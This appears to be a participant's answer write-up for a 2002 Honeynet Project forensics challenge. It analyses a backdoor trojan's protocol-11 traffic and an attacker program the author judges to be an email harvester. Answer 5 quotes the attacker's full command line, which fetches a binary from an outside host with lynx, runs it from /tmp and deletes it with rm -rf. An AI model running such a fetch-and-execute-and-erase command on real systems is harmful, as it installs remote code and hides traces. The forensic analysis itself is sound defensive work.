HoneyNet Challenge Analysis
Scan 22 – August 2002
The Challenge
After penetrating the Linux system using the WU-FTPD vulnerability, the attacker deployed a backdoor binary and then proceeded to use the system for certain nefarious activity. Your mission, should you choose to accept it, is to determine what the activity was and how it was accomplished. All the necessary evidence is contained in the snort binary capture file. The IP address of the honeypot is 172.16.183.2.
Preliminary Steps
As the basis of this attack was the backdoor binary that was the subject of the Reverse Challenge from May 2002, the first step was to read some of the analyses from that Challenge. Of particular value to me was the advisory written by (CoPS) Lab at the University of North Texas, and located here:To summarize, the backdoor binary listens for IP packets which have the protocol number set to 11. As these packets arrive statelessly, the source IP address can be spoofed. These packets have a type number, which is either 2 for command or 3 for reply. The rest of the packets are trivially encoded to hide their contents. Having loaded the Snort log in Ethereal, I could see these packets, beginning at # 7.
In order to read the packets easily, I downloaded and used Dion Mendel's Perl script from the Reverse Challenge. It is located here:I quickly (okay, it took a few minutes of head scratching) found a small typo in the script; on lines 59 and 87 the second $data[4]object should read $data[5]. After making the necessary change, I re-ran the script on the Snort log and studied the output:
94.0.146.98 -> 172.16.183.2 (handler -> agent)I must admit that following this, I spent about six hours becoming more and more baffled. I was working under the assumption that 'foo' was an IRC bot. This assumption was given to me first by The Honeynet Project itself,here.
The assumption was backed up when I started doing Google searches for some of the text that I found in 'foo' and the searches kept coming back with links to an IRC bot named “Puaj”.
Part of the problem I had with this is that I never use IRC. I briefly played around with multi-user BBSs back in the 1980's and since then have always felt that in terms of useful or even entertaining ways of spending time, electronic chat ranks well below scrubbing mildew from the cracks between my bathroom tiles. Hence I did not even really know what an IRC bot was.
So, after spending some time reading about the many varied uses of IRC bots, I was unable to reconcile what I had learned with the behaviour of 'foo', which simply appeared to be requesting the home pages of IRC users. Also, I was still wondering why an IRC hacker would care about the DNS zones hosted by the system (the first command our hacker sent to the NVP Trojan). It was only then when I was beginning to seriously doubt my original assumption that I noticed something odd about the behaviour of 'foo' that gave me a new idea about what the attacker's purpose might be.
I will elaborate on this in the answers section, but I have finally come to the conclusion that this attacker is a spammer or is working for spammers.
Answers
1. What is the attacker's IP Address?
This one is simple: 203.173.144.50. It was sent to the NVP Trojan in the first packet. According to WHOIS, the attacking machine is located in New Zealand.
2. What is the attacker doing first? What do you think is his/her motivation for doing this?
The first thing the attacker does after initializing the trojan is to tell it to run the command:3. Why there is some readable text in packets #17-#25 (and some others), but not in packets #15-#16 (and several others)? What differentiates these groups of packets from each other?
Actually, all of the response packets from the victim have some readable text in them; part of the command executed by the trojan and part of the response. This is due to sloppy coding on the part of the programmer who created the NVP Trojan. To understand why this is happening, I looked at Dion Mendel's source code for the reverse engineered binary.
If you are unfamiliar with C, this section may be confusing to you. If so, I apologize. I considered putting in a paragraph trying to describe how string buffer pointers work but figured that I would probably just end up make it more confusing.
At line 2,211 the code constructs a command string and stores it at a memory location pointed to by 'buffer' (using the dangerous sprintf() function which means that, ironically, the trojan may be vulnerable to buffer overflow attacks!). So, in our attack, we now have a string in memory that reads:So far so good, but the programmer decided that she wanted each response packet to be a random size. What she does is tells the transmit function to start sending the contents of memory starting at the 'output_buffer' pointer and to send 400 bytes plus an extra random number of bytes between one and two hundred. The programmer no doubt assumed that those extra bytes would look like garbage. Well, as I pointed out in my Preliminary Steps section, assumptions can be dangerous. In this case when the program was allocating memory for the strings, it must have given 'buffer' the memory that directly followed that given to 'output_buffer'. You can literally see the results:
In the first response packet (which is sent out 10 times – once to the handler and again to nine random IP addresses), the data section is 512 bytes which means 400 bytes of encoded (and also padded) data plus 112 bytes from the 'buffer' memory. This includes all of the text shown above plus some garbage.
In the second response packet, the data section is 463 bytes; 400 of encoded and padded data and 63 bytes of the text above. Counting it now, I see that I am off by a bit (okay, a bunch of bits), which means that there is probably a few bytes allocated to a integer between the two strings, but the theory still works.
Hence, the programmer has managed to do exactly what they meant to avoid; transmit suspicious looking traffic.
4. What is the purpose of 'foo'? Can you provide more insights about the internal workings of 'foo'? Do you think that 'foo' was coded by a good programmer or by an amateur?
The observed behaviour of foo is thus:
What finally clued me in the idea that the attacker is a spammer is step 4 above. Why, I wondered, didn't 'foo' wait for the full response from the icq.com server? Why was it closing the connection half-way through the web page download? It took me a while but I finally realized that the last packet that 'foo' accepted was the packet that contained the ICQ user's email address. It could be coincidence but I can think of no other explanation for this behaviour: 'foo' is a tool of evil -- a real-life email address harvester.
With the exception of the HTTP GET command, the only readable text in 'foo' is from various pre-existing code such as gethostbyname and yplibc. This leads me to believe that the actual code was obfuscated either as source or during compiling to object code. Still, I can make a few observations about 'foo'. The first is that it contains its own DNS resolver, although it uses the locally configured DNS server name. Probably this is to ensure that it can use DNS even if the local system is not set up to do so, and it likely has a DNS server address to fall back on if it cannot find one in resolv.conf.
More interesting is the inclusion of the Network Information Service (formerly YP) library 'yplibc'. Obviously an email harvester is useless if you cannot retrieve the email addresses it has found. My guess here is that 'foo' is opening an RPC listener process bound to a TCP or UDP port via which the attacker can request the list of email addresses found. This would eliminate the need for the original exploit and would ensure that no suspicious log files are left behind – which is something that the attacker seems concerned about (more on that later).
Finally on the question of the skill of the programmer, I have very little information on which to base an opinion but I would have to say that he or she is closer to amateur than to expert. My reasons for saying so are:
5. What is the purpose of './ttserve ; rm -rf /tmp/ttserve' as done by the attacker?
The full command line sent by the attacker is:
killall -9 ttserve ; lynx -source http://216.242.103.2:8882/foo > /tmp/ttserve ; chmod 755 /tmp/ttserve ; cd /tmp ; ./ttserve ; rm -rf /tmp/ttserve ./ttserve ;
What the attacker is doing here is:
So the purpose of this part of the command is to execute the program then delete it from the disk so that it leaves no easily discernible traces. The attacker is obviously very concerned about this as he or she repeats the rm command three more times.
6. How do you think the attacker will use the results of his activity involving 'foo'?
If my belief is correct and 'foo' is an email address harvester, the attacker will use the results of 'foo' to sent unsolicited commercial email to the poor ICQ users whose email addresses are on display on their generated web pages. The other possibility is that the attacker is not a spammer him or herself but is in the business of selling email addresses to spammers.
Either way, the hapless ICQ users can look forward to seeing their in-boxes fill up with mail inviting them to hot teen sex sites, offering cheap viagara alternatives, and pleadings to help the daughters of former Nigerian dictators.
BONUS QUESTION!As a network administrator, I would never have a firewall so badly misconfigured
that it allowed packets in or out with the IP protocol field set to 11.
Additionally, I would have been alerted to the attempt by my Snort IDS which
would have logged the packets as “Bad Traffic: Non-Standard IP Protocol”,
which I would certainly have investigated further.